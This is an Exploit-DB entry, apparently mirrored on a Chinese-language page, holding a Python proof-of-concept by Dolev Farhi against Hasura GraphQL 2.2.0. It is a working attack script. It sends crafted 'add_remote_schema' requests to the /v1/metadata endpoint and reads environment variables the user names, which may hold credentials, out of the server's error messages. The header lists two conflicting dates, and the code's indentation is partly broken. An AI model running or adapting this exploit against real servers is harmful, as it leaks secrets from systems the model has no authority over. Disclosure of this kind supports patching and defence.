Hasura GraphQL 2.2.0 – Information Disclosure

  • 作者: Dolev Farhi
    日期: 2022-03-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50803/
  • # Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
    # Software: Hasura GraphQL Community
    # Software Link: https://github.com/hasura/graphql-engine
    # Version: 2.2.0
    # Exploit Author: Dolev Farhi
    # Date: 5/05/2022
    # Tested on: Ubuntu
    
    import requests
    
    SERVER_ADDR = 'x.x.x.x'
    
    url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
    
    print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
    
    while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
    continue
    
    payload = {
    "type": "bulk",
    "source": "",
    "args": [
    {
    "type": "add_remote_schema",
    "args": {
    "name": "ttt",
    "definition": {
    "timeout_seconds": 60,
    "forward_client_headers": False,
    "headers": [],
    "url_from_env": env_var
    },
    "comment": ""
    }
    }
    ],
    "resource_version": 2
    }
    r = requests.post(url, json=payload)
    try:
     print(r.json()['error'].split('not a valid URI:')[1])
    except IndexError:
    print('Could not parse out VAR, dumping error as is')
    print(r.json().get('error', 'N/A'))